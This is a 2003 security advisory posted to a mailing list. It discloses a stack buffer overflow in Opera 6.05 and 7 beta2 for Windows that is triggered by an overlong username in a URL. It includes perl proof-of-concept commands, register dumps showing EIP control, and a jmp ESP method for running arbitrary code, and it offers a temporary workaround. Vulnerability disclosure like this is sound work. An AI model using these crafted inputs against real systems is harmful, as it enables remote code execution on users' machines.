Hello all.
We release the information about the vulnerability
of Opera, here.
And we wish that this vulnerability is fixed by Vendor,
immediately.
___________________________________________________
--------------------------------------------------------------
Synopsis: Opera Username Buffer Overflow Vulnerability
Product: Opera for Windows
Version: 6.05 build1140 (and Opera7 beta2 build2577)
Vendor: Opera Software ASA (http://www.opera.com/)
Risk: High. Execute arbitrary binary code
Remote: Yes
Local: Yes
Discovered: nesumin <nesuminat_private>
Reported: 2003-02-02
Published: 2003-02-09
--------------------------------------------------------------
Product :
Opera for windows is GUI base WEB Browser.
It has Mail, News, IM client.
Opera Software ASA
http://www.opera.com/
OverView :
Opera6.05 build 1140 (and Opera7 beta2 build 2577) for Windows
has the critical vulnerability.
When Opera will open the URL of HTTP that contains
the "a long username", buffer overflow occurs on the stack.
An attacker can cause it using link(anchor tag),
picture(image tag), frame, script, etc.
Then, it can overwrite saved RET address on stack,
and it enables to execute the arbitrary binary code.
If Opera user opens malicious URL,
they may suffer damage, such as system destruction
and virus infection, etc.
Tested on :
Opera
Opera6.05 build 1140
Opera7 beta2 build 2577
Opera7.00 build 2637
Opera7.01 build 2651
English edition and Japanese edition.
Platform
Windows98SE JP
Windows2000 SP3 JP
WindowsXP SP1 JP
Vulnerable in tested :
Opera6.05 build 1140
Opera7 beta2 build 2577
Unvulnerable in tested :
Opera7.00 build 2637
Opera7.01 build 2651
Vendor status :
Already reported, 2003/02/02.
But we don't know the correspondence and attitude of
Opera Software ASA against this vulnerability
because we didn't have the formal reply from Opera Software ASA.
Solution :
We propose the following temporary method until this vulnerability
is fixed by vendor.
It is the method of deleting two "%s" from the string of
the resource number "21463" in the language file (*.lng).
Thereby, User name and Server name is also no longer displayed
in the URL warning dialog.
Details :
When Opera will open the URL of HTTP Protocol that contains
an user name, it will use the format string of the resource
number "21463" in a language file, and will generate the string
for displaying on the "URL Warning Dialog".
Then Overflow occurs by the Local Buffer on the Stack by
specifying "long user name", because there is not length-check
against the user name.
(The length of the whole URL has restriction)
The RET address can be overwritten by about 2624 characters
(16bits), it depends on the string of "21463".
[Opera6.05 build 1140, english language file]
$ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"
---------------------------------------------------------------------
Exception C0000005
EAX=00410041 EBX=01B5F9BA ECX=0012E254 EDX=01B60E58 ESI=01A8A940
EDI=77DF6001 EBP=0012E278 ESP=0012CDD8 EIP=00423D68 FLAGS=00000216
0012CDD8 00000110 00000001 005F2464 00200020 ........d$_. . .
0012CDE8 00200020 00730055 00720065 0061006E . .U.s.e.r.n.a.
0012CDF8 0065006D 0020003A 00410041 00410041 m.e.:. .A.A.A.A.
0012CE08 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
....
0012E268 00410041 00410041 00410041 00410041 A.A.A.A.A.A.A.A.
0012E278 >00410041 00410041 007D0020 007C031E A.A.A.A. .....|.
0012E288 01A8A940 007D02D0 0012E2D8 00000000 @.....}...E.....
---------------------------------------------------------------------
In the above case, Access violation occurs before EIP moves to
the RET address. But EIP is movable by setting the fake values,
0x80000001 or other values to the area which is referred to
after overwritten.
$ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"
"%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
(with "Encode all addresses with UTF-8" setting.)
---------------------------------------------------------------------
Exception C0000005
EAX=00000001 EBX=005F2464 ECX=00010101 EDX=F03639D8 ESI=00000001
EDI=00000110 EBP=80000001 ESP=0012E28C *EIP=FEFEFEFE FLAGS=00000202
---------------------------------------------------------------------
ESP register points to the position of the RET address's
offsets value + about 0x10 bytes.
Therefore, It is possible to execute the arbitrary binary code
by overwriting the RET address in the address of the "jmp ESP"
instruction, putting the binary code after the area
which is pointed by ESP register.
In Opera7.0 build 2637 or later, we could not confirm
this vulnerability.
[Note]
The user name written in the buffer by this vulnerability
is changed into 16bit wide characters.
When the setting of "Encode all addresses with UTF-8" is
enabled and the user name encoded by UTF or etc is specified,
the exploit data easily can be set on the stack.
And, If the setting of it is disabled,
It becomes very difficult.
Sample Code : (attached file)
o6unexp.c
This program is the generator that creates Exploit HTML files.
test compiled, Visual C++ 6.
* This source code is only as sample checking vulnerability.
* It is a user's responsibility whatever result is occurred
by this code.
Special thanks :
:: Operash ::
[ Unofficial Opera's Bug and Security information site for Japanese people ]
imagine (Operash webmaster)
melorin
Contacts, Etc :
nesumin <nesuminat_private>
This information does not assure the contents.
We may correct the contents of this information to timely.
We take no responsibility for any damage generated by using
this information.
___________________________________________________
--------------------------------------------------
nesumin <nesuminat_private>
This archive was generated by hypermail 2b30 : Mon Feb 10 2003 - 09:36:51 PST